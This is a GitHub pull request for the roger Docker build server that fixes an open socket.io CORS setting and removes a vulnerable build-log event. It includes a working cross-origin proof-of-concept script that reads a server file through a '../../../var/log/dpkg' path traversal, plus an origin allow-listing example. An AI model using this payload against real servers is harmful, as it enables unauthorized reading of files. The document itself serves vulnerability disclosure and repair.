namshi / roger

A continuous integration and build server for Docker containers

[Security] Fix unsafe CORS configuration #49

Closed nadirrrr closed 6 years ago

nadirrrr commented 6 years ago

CORS enabled by default on socket.io server, allowing cross origin requests

The CORS configuration is enabled by default by socket.io, and roger hasn't set the configuration, therefore socket.io will respond to requests from other origins with the Access-Control-Allow-Credentials and Access-Control-Allow-Origin on any request. This will allow an attacker to make cross-origin requests to the socket.io server, as every origin is allowed.

The CORS misconfiguration could be further escalated due to a path traversal vulnerability. This would allow an attacker to:

The attacker requires the following from the victim:

Proof of Concept

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.1.0/socket.io.js" type="text/javascript"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io-stream/0.9.1/socket.io-stream.js"></script>
<script type="text/javascript">
    // The roger instance host, for me it was localhost:8082, and I was running the host from a different origin
    var socket = io.connect('http://localhost:8082');

    var stream = ss.createStream();

    // Emit get-build-log, supply stream and buildId, where a path traversal vulnerability was found.
    ss(socket).emit('get-build-log', stream, {buildId: "../../../var/log/dpkg"});

    stream.on('data', function(chunk) {
        // print chunks of data in console.log
        console.log(chunk.toString());
    });
</script>
```

My first thought was that the socket.io server wasn't used anymore, but apparently it is still required. I have set socket.io to only accept the origin specified in the configuration file at app.url. This should fix the issue and disallow any other origin from interacting with the socket.io server.

I have removed the get-build-log event as it's not required anymore. The functionality was removed on the client side in #33.

I have used https://socket.io/docs/server-api/#server-origins-fn.
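The origin restriction described above, as an added example that is not roger's own code: a checker in the shape socket.io 2.x's `io.origins(fn)` expects, comparing each request's Origin with the origin of the configured app.url. `appUrl` is assumed to hold that config value; `makeOriginChecker` and `isOriginAllowed` are names introduced here.

```javascript
// Added example (not roger's code): origin allow-listing for socket.io 2.x io.origins(fn).
// Assumes `appUrl` is the app.url value read from roger's configuration file.

// Normalize a full URL (app.url) or an Origin header value to the
// "scheme://host[:port]" form browsers send; default ports are dropped and
// the host is lower-cased by the URL parser. Returns null if unparseable.
function normalizeOrigin(value) {
  try {
    return new URL(value).origin;
  } catch (e) {
    return null;
  }
}

// Build the function socket.io 2.x calls as fn(origin, callback),
// where callback(err, allowed) grants or refuses the handshake.
function makeOriginChecker(appUrl) {
  const allowed = normalizeOrigin(appUrl);
  if (!allowed) throw new Error('app.url must be an absolute URL');
  return function checkOrigin(origin, callback) {
    // socket.io 2.x passes '*' when the request has no Origin header or a
    // "null" Origin (e.g. a file:// page); normalizeOrigin('*') is null, so
    // such requests are refused here rather than echoed back as allowed.
    if (normalizeOrigin(origin) === allowed) {
      return callback(null, true);
    }
    return callback('origin not allowed', false);
  };
}

// Synchronous wrapper for tests and for reasoning about a single decision.
function isOriginAllowed(appUrl, origin) {
  let result = false;
  makeOriginChecker(appUrl)(origin, function (err, ok) {
    result = !err && ok === true;
  });
  return result;
}

// Wiring, given a socket.io 2.x server instance `io`:
//   io.origins(makeOriginChecker(appUrl));
```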

odino commented 6 years ago

@nadirio I see we removed the 'get-build-log' endpoint for socket.io, are you sure build streaming still works with this removed?

nadirrrr commented 6 years ago

Hi @odino! Yes I did. And I am sure. As we can see here https://github.com/namshi/roger/pull/33/commits/b5381efc9dad30d4c534fe08536a3e3317461af6#diff-8b7ac49cbb975e91e103ff6dad18ec2cL36 and https://github.com/namshi/roger/pull/33/commits/b5381efc9dad30d4c534fe08536a3e3317461af6#diff-8b7ac49cbb975e91e103ff6dad18ec2cL4, socket.io-stream was removed on the client side, meaning we do not require the event anymore.

odino commented 6 years ago

Thanks a bunch!